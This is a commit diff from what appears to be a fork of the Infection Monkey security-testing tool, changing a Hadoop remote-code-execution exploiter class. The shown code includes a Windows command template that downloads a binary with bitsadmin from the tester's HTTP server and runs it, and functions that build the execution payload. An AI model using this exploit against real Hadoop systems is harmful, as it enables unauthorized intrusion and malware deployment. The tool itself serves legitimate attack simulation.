forked from p34709852/monkey
Hadoop exploitation tested on windows and linux
This commit is contained in:
parent
568320c298
commit
818aae3a2c
|
@ -11,7 +11,7 @@ import logging
|
||||||
from exploit.web_rce import WebRCE
|
from exploit.web_rce import WebRCE
|
||||||
from tools import HTTPTools, build_monkey_commandline, get_monkey_depth
|
from tools import HTTPTools, build_monkey_commandline, get_monkey_depth
|
||||||
import posixpath
|
import posixpath
|
||||||
from model import MONKEY_ARG, ID_STRING, DROPPER_ARG
|
from model import MONKEY_ARG, ID_STRING
|
||||||
|
|
||||||
__author__ = 'VakarisZ'
|
__author__ = 'VakarisZ'
|
||||||
|
|
||||||
|
@ -32,14 +32,12 @@ class HadoopExploiter(WebRCE):
|
||||||
" Update /download /priority high %(http_path)s %(monkey_path)s " \
|
" Update /download /priority high %(http_path)s %(monkey_path)s " \
|
||||||
"& %(monkey_path)s %(monkey_type)s %(parameters)s"
|
"& %(monkey_path)s %(monkey_type)s %(parameters)s"
|
||||||
# How long we have our http server open for downloads in seconds
|
# How long we have our http server open for downloads in seconds
|
||||||
DOWNLOAD_TIMEOUT = 90
|
DOWNLOAD_TIMEOUT = 60
|
||||||
# Random string's length that's used for creating unique app name
|
# Random string's length that's used for creating unique app name
|
||||||
RAN_STR_LEN = 6
|
RAN_STR_LEN = 6
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(HadoopExploiter, self).__init__(host, {'linux': './monkey.sh',
|
super(HadoopExploiter, self).__init__(host)
|
||||||
'win32': '%temp%\\monkey32.exe',
|
|
||||||
'win64': '%temp%\\monkey64.exe'})
|
|
||||||
|
|
||||||
def exploit_host(self):
|
def exploit_host(self):
|
||||||
# Try to get exploitable url
|
# Try to get exploitable url
|
||||||
|
@ -77,16 +75,15 @@ class HadoopExploiter(WebRCE):
|
||||||
return resp.status_code == 200
|
return resp.status_code == 200
|
||||||
|
|
||||||
def build_command(self, path, http_path):
|
def build_command(self, path, http_path):
|
||||||
default_path = self.get_default_dropper_path()
|
|
||||||
# Build command to execute
|
# Build command to execute
|
||||||
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, default_path)
|
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||||
if 'linux' in self.host.os['type']:
|
if 'linux' in self.host.os['type']:
|
||||||
base_command = self.LINUX_COMMAND
|
base_command = self.LINUX_COMMAND
|
||||||
else:
|
else:
|
||||||
base_command = self.WINDOWS_COMMAND
|
base_command = self.WINDOWS_COMMAND
|
||||||
|
|
||||||
return base_command % {"monkey_path": path, "http_path": http_path,
|
return base_command % {"monkey_path": path, "http_path": http_path,
|
||||||
"monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
|
"monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def build_payload(app_id, name, command):
|
def build_payload(app_id, name, command):
|
||||||
|
|
Loading…
Reference in New Issue